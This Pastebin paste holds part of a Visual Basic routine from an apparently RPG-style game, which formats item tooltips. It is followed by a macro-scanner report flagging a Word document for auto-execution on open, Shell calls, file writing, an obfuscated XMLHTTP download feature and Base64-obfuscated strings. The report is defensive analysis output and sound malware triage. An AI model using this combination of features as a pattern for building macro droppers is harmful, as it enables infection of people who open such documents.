  633.  St1 = ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).Name + " " + Object(Character.EquippedObject(TheObj).Object).Name
  634.  If Character.EquippedObject(TheObj).ItemSuffix > 0 Then
  635.  St1 = St1 + " " + ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).Name + vbCrLf
  636.  Else
  637.  St1 = St1 + vbCrLf
  638.  End If
  639.  Else
  640.  St1 = Object(Character.EquippedObject(TheObj).Object).Name
  641.  If Character.EquippedObject(TheObj).ItemSuffix > 0 Then
  642.  If Len(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).Name) > 0 Then
  643.  St1 = St1 + " " + ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).Name + vbCrLf
  644.  Else
  645.  St1 = St1 + vbCrLf
  646.  End If
  647.  Else
  648.  St1 = St1 + vbCrLf
  649.  End If
  650.  End If
  651.  Else
  652.  St1 = Object(Character.EquippedObject(TheObj).Object).Name
  653.  If Character.EquippedObject(TheObj).ItemSuffix > 0 Then
  654.  St1 = St1 + " " + ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).Name + vbCrLf
  655.  Else
  656.  St1 = St1 + vbCrLf
  657.  End If
  658.  End If
  659.  If Character.EquippedObject(TheObj).ItemPrefix > 0 Then
  660.  St1 = St1 + "Bonus (+"
  661.  Select Case ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationType
  662.  Case 8
  663.  St1 = St1 + CStr(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationValue) + " HP"
  664.  Case 9
  665.  St1 = St1 + CStr(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationValue) + " Energy"
  666.  Case 10
  667.  St1 = St1 + CStr(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationValue) + " Mana"
  668.  Case 11
  669.  St1 = St1 + CStr(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationValue) + " Damage"
  670.  Case 12
  671.  St1 = St1 + CStr(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationValue) + " Defense"
  672.  Case 13
  673.  St1 = St1 + CStr(ItemPrefix(Character.EquippedObject(TheObj).ItemPrefix).ModificationValue) + " Magic Defense"
  674.  End Select
  675.  If Character.EquippedObject(TheObj).ItemSuffix > 0 Then
  676.  St1 = St1 + ", +"
  677.  Select Case ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationType
  678.  Case 8
  679.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " HP"
  680.  Case 9
  681.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Energy"
  682.  Case 10
  683.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Mana"
  684.  Case 11
  685.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Damage"
  686.  Case 12
  687.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Defense"
  688.  Case 13
  689.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Magic Defense"
  690.  End Select
  691.  St1 = St1 + ")" + vbCrLf
  692.  Else
  693.  St1 = St1 + ")" + vbCrLf
  694.  End If
  695.  Else
  696.  If Character.EquippedObject(TheObj).ItemSuffix > 0 Then
  697.  St1 = St1 + "Bonus (+"
  698.  Select Case ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationType
  699.  Case 8
  700.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " HP"
  701.  Case 9
  702.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Energy"
  703.  Case 10
  704.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Mana"
  705.  Case 11
  706.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Damage"
  707.  Case 12
  708.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Defense"
  709.  Case 13
  710.  St1 = St1 + CStr(ItemSuffix(Character.EquippedObject(TheObj).ItemSuffix).ModificationValue) + " Magic Defense"
  711.  End Select
  712.  St1 = St1 + ")" + vbCrLf
  713.  Else
  714.  End If
  715.  End If
  716.  Select Case Object(Character.EquippedObject(TheObj).Object).Type
  717.  Case 6
  718.  St1 = St1 + "[" + CStr(Character.EquippedObject(TheObj).Value) + "]"
  719.  Case 11
  720.  St1 = St1 + "Ammunition" & vbCrLf & "[" + CStr(Character.EquippedObject(TheObj).Value) + "]" & vbCrLf & "+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Damage"
  721.  Case 1
  722.  St1 = St1 + "Weapon (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Damage)" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.EquippedObject(TheObj).Object)
  723.  Case 10
  724.  St1 = St1 + "Projectile Weapon (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Damage)" & vbCrLf & GenerateRequirements(Character.EquippedObject(TheObj).Object)
  725.  Case 2, 3, 4
  726.  If Object(Character.EquippedObject(TheObj).Object).Type = 3 Then
  727.  St1 = St1 + "Armor (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Defense, +" & Object(Character.EquippedObject(TheObj).Object).Data2 & " Magic Defense)"
  728.  ElseIf Object(Character.EquippedObject(TheObj).Object).Type = 4 Then
  729.  St1 = St1 + "Helm (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Defense, +" & Object(Character.EquippedObject(TheObj).Object).Data2 & " Magic Defense)"
  730.  ElseIf Object(Character.EquippedObject(TheObj).Object).Type = 2 Then
  731.  St1 = St1 + "Shield (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Defense, +" & Object(Character.EquippedObject(TheObj).Object).Data2 & " Magic Defense)"
  732.  End If
  733.  St1 = St1 & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.EquippedObject(TheObj).Object)
  734.  Case 8
  735.  If Object(Character.EquippedObject(TheObj).Object).Data2 = 0 Then
  736.  St1 = St1 + "Ring (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Damage)" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.EquippedObject(TheObj).Object)
  737.  ElseIf Object(Character.EquippedObject(TheObj).Object).Data2 = 1 Then
  738.  St1 = St1 + "Ring (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Defense)" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.EquippedObject(TheObj).Object)
  739.  ElseIf Object(Character.EquippedObject(TheObj).Object).Data2 = 2 Then
  740.  St1 = St1 + "Ring (+" & Object(Character.EquippedObject(TheObj).Object).Modifier & " Magic Defense)" & vbCrLf & "Condition: " & DurString(CurInvObj) & vbCrLf & GenerateRequirements(Character.EquippedObject(TheObj).Object)
  741.  End If
  742.  End Select
  743.  If ExamineBit(Object(Character.EquippedObject(TheObj).Object).Flags, 0) = 255 Then St1 = St1 + vbCrLf + "Cannot be repaired"
  744.  If ExamineBit(Object(Character.EquippedObject(TheObj).Object).Flags, 2) = 255 Then St1 = St1 + vbCrLf + "Does not drop on death"
  745.  If ExamineBit(Object(Character.EquippedObject(TheObj).Object).Flags, 3) = 255 Then St1 = St1 + vbCrLf + "Two Handed - Cannot use a shield"
  746.  If ExamineBit(Object(Character.EquippedObject(TheObj).Object).Flags, 6) = 255 Then St1 = St1 + vbCrLf + "Cannot be traded"
  747.  If Object(Character.EquippedObject(TheObj).Object).SellPrice > 0 Then St1 = St1 + vbCrLf + "Sells for " + CStr(Object(Character.EquippedObject(TheObj).Object).SellPrice) + " gold"
  748.  SetObjectInfo St1
  749.  Else
  750.  frmMain.lblCurObj = vbNullString
  751.  SetObjectInfo vbNullString
  752.  End If
  753.  End If
  754.  End If
  755. End Sub
  756.  
  757.  
  758.  
  759.  
  760.  
  761.  
  762. +------------+----------------------+-----------------------------------------+
  763. | Type       | Keyword              | Description                             |
  764. +------------+----------------------+-----------------------------------------+
  765. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  766. | Suspicious | Open                 | May open a file                         |
  767. | Suspicious | Shell                | May run an executable file or a system  |
  768. |            |                      | command                                 |
  769. | Suspicious | Shell.Application    | May run an application (if combined     |
  770. |            |                      | with CreateObject)                      |
  771. | Suspicious | RegCloseKey          | May read or write registry keys         |
  772. | Suspicious | CreateObject         | May create an OLE object                |
  773. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  774. |            |                      | strings                                 |
  775. | Suspicious | ADODB.Stream         | May create a text file                  |
  776. | Suspicious | SaveToFile           | May create a text file                  |
  777. | Suspicious | Write                | May write to a file (if combined with   |
  778. |            |                      | Open)                                   |
  779. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  780. |            |                      | (obfuscation: VBA expression)           |
  781. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  782. |            |                      | may be used to obfuscate strings        |
  783. |            |                      | (option --decode to see all)            |
  784. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  785. |            | Strings              | may be used to obfuscate strings        |
  786. |            |                      | (option --decode to see all)            |
  787. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  788. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top